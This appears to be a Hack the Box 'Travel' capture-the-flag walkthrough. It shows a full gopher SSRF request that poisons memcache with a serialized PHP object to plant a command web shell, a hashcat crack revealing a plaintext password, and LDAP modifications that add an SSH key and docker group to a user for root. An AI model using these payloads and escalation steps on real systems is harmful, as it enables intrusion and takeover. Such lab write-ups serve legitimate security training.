Hack the Box: Travel

Travel

User

Main page
Blog subdomain
Awesome RSS
Blog-dev subdomain
Dumping .git repo
Repo content
README.md file
Debug comment
Sending payload
Memcache write confirmation
A part of key
Memcache key
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty`
../../uploads/payload.php
Gopherus memcache generation
GET /awesome-rss/?debug=1&custom_feed_url=gopher://127.00.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20443%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22%00TemplateHelper%00file%22%3Bs:28:%22%2E%2E/%2E%2E/%2E%2E/uploads/payload.php%22%3Bs:20:%22%00TemplateHelper%00data%22%3Bs:316:%22%3B%3Chtml%3E%3Cbody%3E%3Cform%20method%3D%22GET%22%20name%3D%22%3C%3Fphp%20echo%20basename%28%24_SERVER%5B%27PHP_SELF%27%5D%29%3B%20%3F%3E%22%3E%3Cinput%20type%3D%22TEXT%22%20name%3D%22cmd%22%20id%3D%22cmd%22%20size%3D%2280%22%3E%3Cinput%20type%3D%22SUBMIT%22%20value%3D%22Execute%22%3E%3C/form%3E%3Cpre%3E%3C%3Fphp%20%20%20%20if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%7Bsystem%28%24_GET%5B%27cmd%27%5D%29%3B%7D%3F%3E%3C/pre%3E%3C/body%3E%3Cscript%3Edocument.getElementById%28%22cmd%22%29.focus%28%29%3B%3C/script%3E%3C/html%3E%22%3B%7D%0d%0a HTTP/1.1Host: blog.travel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Webshell

User

Wordpress backup
Lynik-admin hash
# hashcat.exe -m400 -a0 hashes.txt rockyou.txt
-- snip --
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
User flag

Root

.ldaprc
hosts file
LDAP password
# ssh lynik-admin@travel.htb -D 1080
# proxychains4 ldapsearch -x -o ldif-wrap=no -h 172.20.0.10 -b "dc=travel,dc=htb" -D 'cn=lynik-admin,dc=travel,dc=htb' -W
-- snip --
# travel.htb
dn: dc=travel,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: Travel.HTB
dc: travel
--snip --
# linux, servers, travel.htb
dn: ou=linux,ou=servers,dc=travel,dc=htb
description: Linux Servers
objectClass: organizationalUnit
ou: linux
-- snip --
# jane, users, linux, servers, travel.htb
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: jane
uidNumber: 5005
homeDirectory: /home/jane
givenName: Jane
gidNumber: 5000
sn: Rodriguez
cn: Jane Rodriguez
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash
-- snip --
$ cat /etc/group
root:x:0:
-- snip --
docker:x:117:
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDKaHUB/NbqgaSrI6orQXxMcbdRnZ1EAzpRBYKp2x1of/DVCnSkyv2sOo5NxRa+g9mBf+PaqbyEanWtuMY2v0rrBr86Q9fHOvYA7S597ElikYf35uHlaq9iBdm4v/swijm4lZofQJT8atgUOv8dZbw2GSsxgjlSnUKeYH31bpVhmsIX660vALgxcN0FUsEuApX7NjycENldmGZ4bcD87IxTGXR6dLgcvMAaaokoMFZVKcuk8nABxvWlUol/Z5uPpQIMBJtPpre5ytxT2GXY3EKskGN/JHH9moV6z36ji2TLJFCVUBGqQrCWIgWq8bEjOpJ1B5507f0RalBUCPLU0yE2Uybhb8eJxbFd7dnDQnwYLwFUSR2YO5k+xFxFJKDReAC+ccSYEjZ/nFCI+E8b8P2xbuJA3Kkf2mpBitCLV6L1kP61oh3nJENT5kNVPscUPCxFUnnr1HN2yLQIbRfIB5sVtG5J3FSaA+SbEJ2CpTxTwJQ/ft7zF8Cjr9eqAIIiW1TNzPgYWRsE1HIXr3HVBA6eEyLpQLf6/dsoL6I/jFn1s03btvaunkX+8FmW8BNEnEIOxr5F/ZYhFAGooYjfXPa1mcdU2S7Cgg1VVZqsss0IF2ejuawILPAIf1Y7agIHEckSWdKEHZX2mINm1IyDBIZvO7CevbDT8aIL+zZa8zDjRw== tellico@htb
-
replace: gidNumber
gidNumber: 117
Access as Jane
List of docker images
Root flag

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store